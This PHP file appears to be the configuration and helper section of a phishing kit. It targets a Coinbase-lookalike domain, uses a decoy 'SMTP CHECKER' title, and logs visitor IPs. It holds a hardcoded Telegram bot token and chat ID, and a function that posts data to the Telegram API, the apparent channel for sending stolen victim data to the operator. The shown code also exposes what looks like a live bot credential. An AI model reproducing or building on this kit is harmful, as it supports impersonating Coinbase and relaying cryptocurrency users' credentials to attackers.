<?php
session_start();
define('API_KEY', '1847280168:AAGR9JY20lXvo44Xph9BrgAsYgwYnoJCy_E');

//SET WEBSITE
$config = [
    'title' => 'SMTP CHECKER',
    'url' => 'https://coinbase.zalgips.com/',
    'parameter' => 'boyxd',
    'chat_id' => '5217384371',
    'alex' => 'on'
];

function bot($method,$datas=[]){
    $url = "https://api.telegram.org/bot".API_KEY."/".$method;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);
    $res = curl_exec($ch);
    if (curl_error($ch)) {
        var_dump(curl_error($ch));
    }else{
        return json_decode($res);
    }
}

function getUserIP(){
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP)) {
        $ip = $client;
    }elseif(filter_var($forward, FILTER_VALIDATE_IP)) {
        $ip = $forward;
    }else{
        $ip = $remote;
    }

    return $ip;
}

function tulis_file($nama, $isi) {
  $click = fopen("$nama","a");
    fwrite($click,"$isi"."\n");
    fclose($click);
}

$ip = getUserIP();
if($ip == "127.0.0.1") {
    $ip = "";
}

function sendmsg($text){
    echo $text;exit();
}
?>
